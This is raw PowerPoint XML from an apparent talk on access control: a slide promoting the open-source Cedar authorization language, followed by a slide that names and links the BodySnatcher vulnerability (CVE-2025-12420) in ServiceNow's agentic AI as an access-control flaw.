      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8902407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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DCBA7A0-829C-1129-59D8-DBDD93238C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3342698" y="841285"/>
            <a:ext cx="4493947" cy="1292662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Cedar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56DA64A-7D59-C6DA-91D0-67D6B80125E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="762000" y="4128991"/>
            <a:ext cx="3924300" cy="4017522"/>
            <a:chOff x="5112047" y="4496524"/>
            <a:chExt cx="1255770" cy="1285602"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Circle">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35FDACC6-983E-EB3F-0177-301F8483C4AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5112047" y="4496524"/>
              <a:ext cx="1255770" cy="1285602"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0070C0"/>
                </a:gs>
                <a:gs pos="41568">
                  <a:srgbClr val="B6DDDC"/>
                </a:gs>
                <a:gs pos="64540">
                  <a:srgbClr val="D3FFBC"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000"/>
            </a:gradFill>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="109728" tIns="109728" rIns="109728" bIns="109728" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent3">
                      <a:hueOff val="815354"/>
                      <a:satOff val="6932"/>
                      <a:lumOff val="42983"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr sz="1800" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Cedar 1 - black tree.png" descr="Cedar 1 - black tree.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E697A0B-6A02-83B6-BB74-E97485CA7EC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:alphaModFix amt="50048"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5365661" y="4599208"/>
              <a:ext cx="737604" cy="1080234"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C08BE6-78E8-8CBA-70B5-3EF92E1015E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="672808" y="8534628"/>
            <a:ext cx="14222880" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Open source at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/cedar-policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09BDA005-86B2-80F3-C60B-AEDECFE94D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5255948" y="9461601"/>
            <a:ext cx="4628752" cy="4334812"/>
            <a:chOff x="2627974" y="4730800"/>
            <a:chExt cx="2314376" cy="2167406"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Graphic 2" descr="Download with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9024646C-E571-5C25-6ECE-FA4CD1B560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7975" y="4730800"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5909AC3B-6D69-E70B-25B0-B68555A251E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2627974" y="5651711"/>
              <a:ext cx="1290349" cy="1246495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" rIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
                <a:t>3,162,440</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
                <a:t>D</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0"/>
                <a:t>ownloads</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:endParaRPr lang="en-US" sz="10000" dirty="0" err="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Graphic 7" descr="Star with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18F5AAC6-DDBD-7BE8-18E1-C488FA0732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7952" y="4767699"/>
              <a:ext cx="790981" cy="790981"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EAE8D74-E0CF-1FB4-AA6E-ACCC7884103D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4027951" y="5637138"/>
              <a:ext cx="914399" cy="477054"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" rIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
                <a:t>1,300+</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0"/>
                <a:t>Stars </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" i="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E23DC97-29AE-B5C3-A38E-B6F933FCD7F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992069" y="4146943"/>
            <a:ext cx="14222880" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Used in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>30+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t> Amazon services and applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71460A57-B6AD-DCA9-0362-A428EE64847E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5255952" y="4990962"/>
            <a:ext cx="18366048" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>and by Cloudflare, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1"/>
              <a:t>Cloudinary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>, MongoDB, Salesforce, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1"/>
              <a:t>StrongDM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="!!Title2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D55C76-C8DC-1B94-B737-BB135B889966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836646" y="841284"/>
            <a:ext cx="21608002" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="91440" rIns="0" bIns="91440" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="4000" b="1"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sz="8000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a new authorization language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05558C5D-3BA2-F053-C703-CCC5AE3D4ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-275098" y="6058561"/>
            <a:ext cx="15406760" cy="1094280"/>
            <a:chOff x="-137549" y="3701991"/>
            <a:chExt cx="7703380" cy="547140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{096E3DDA-20B7-1177-002F-11D1B68EE29D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4512539" y="3701991"/>
              <a:ext cx="2656114" cy="547140"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5DDFF22-7339-D0C4-FD0D-64DDD0449BEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-137549" y="3741587"/>
              <a:ext cx="7703380" cy="415499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="4800" dirty="0"/>
                <a:t>Now part of	</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{531DC2B0-E5DD-D589-AFF5-105D4ECC2190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14895688" y="6055595"/>
            <a:ext cx="10018840" cy="7660406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F548306-1AF7-6EF4-B9C0-C76AC4E9786D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9073940" y="2303720"/>
            <a:ext cx="5374868"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Light"/>
              </a:rPr>
              <a:t>(Shameless plug!)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0B94E46-0E4C-7E40-5682-44297FC44915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769806" y="12654116"/>
            <a:ext cx="6286096" cy="79641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977813510"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advTm="2081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A975-9A2C-EF2F-EB01-9A5EC394EECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BodySnatcher</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="6400" dirty="0"/>
              <a:t>CVE-2025-12420</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2411C438-5E93-FB04-12B0-E0F3D5A575EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5CCA48C-726D-A237-E300-CFAEFB68F4BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3420960" y="3352800"/>
            <a:ext cx="18189360" cy="7269075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79516BD4-4A6D-1DF9-F651-8BCCAF344116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2823552" y="10828754"/>
            <a:ext cx="1921355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t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>appomni.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>ao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>-labs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>bodysnatcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>-agentic-ai-security-vulnerability-in-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>servicenow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B59149C-D556-9CAC-FCAE-4430C58EC43E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19000819" y="693328"/>
            <a:ext cx="4666108" cy="2452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Light"/>
              </a:rPr>
              <a:t>CWE-284: Improper Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2CA71B9-2827-1F8E-779D-E7222285EBE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015907" y="691453"/>
            <a:ext cx="5235407" cy="32220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5000" b="0" i="0" u="sng" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>Access control </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="5000" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" marR="0" indent="-6858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dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
